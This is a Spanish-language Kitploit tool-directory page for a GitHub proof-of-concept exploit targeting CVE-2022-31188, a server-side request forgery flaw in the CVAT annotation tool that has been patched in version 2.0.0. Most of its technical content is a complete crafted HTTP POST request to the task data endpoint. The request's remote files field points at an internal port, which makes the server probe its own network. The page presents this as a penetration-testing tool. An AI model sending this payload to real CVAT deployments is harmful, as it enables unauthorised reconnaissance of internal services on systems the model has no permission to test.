Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-31188 — Exploit de prueba de concepto para CVE-2022-31188, una vulnerabilidad SSRF en OpenCV CVAT que permite a usuarios autenticados con permisos de Crear Tarea sondear puertos de red internos. | Kitploit
Herramientas/GitHubGitHub/emirpolatt/cve-2022-31188
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubemirpolatt/cve-2022-31188

CVE-2022-31188

Exploit de prueba de concepto para CVE-2022-31188, una vulnerabilidad SSRF en OpenCV CVAT que permite a usuarios autenticados con permisos de Crear Tarea sondear puertos de red internos.

Ver Repositorio
542hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-31188

CVE-2022-31188 - SSRF en OpenCV CVAT (Computer Vision Annotation Tool)

CVAT es una herramienta de anotación de visión por computadora de código abierto desarrollada por Intel. Cualquier usuario con autorización "Task Create" puede desencadenar la vulnerabilidad SSRF al enviar una solicitud HTTP maliciosa y obtener acceso a otros puertos abiertos del sistema.

La vulnerabilidad fue corregida con la actualización 2.0.0 de CVAT.

root@kitploit:~
POST /api/v1/tasks/2/data HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: application/json, text/plain, */*
Accept-Language:en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Token 06d88f739a10c7533991d8010761df721b790b7
X-CSRFTOKEN:65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGV
Content-Type: multipart/form-data; boundary=-----------------------------251652214142138553464236533436
Content-Length: 569
Origin: http://localhost:8080
Connection: close
Referer:http://localhost:8080/tasks/create
Cookie: csrftoken=65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGv; sessionid=dzks19fhlfan8fgq0j8j5toyrh49dned
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------251652214142138553464236533436
Content-Disposition: form-data; name="remote files[0]"

http://localhost:8081
-----------------------------251652214142138553464236533436
Content-Disposition: form-data; name=" image quality"

170
-----------------------------251652214142138553464236533436
Content-Disposition: form-data; name="use zip chunks"

true
-----------------------------251652214142138553464236533436
Content-Disposition: form-data; name="use cache"

true
-----------------------------251652214142138553464236533436--

Referencias

  • https://nvd.nist.gov/vuln/detail/CVE-2022-31188
  • https://github.com/opencv/cvat/security/advisories/GHSA-69qq-p6vh-xjqj

Autor: Emir Polat

Twitter: https://twitter.com/devilsgrins

Descargar herramienta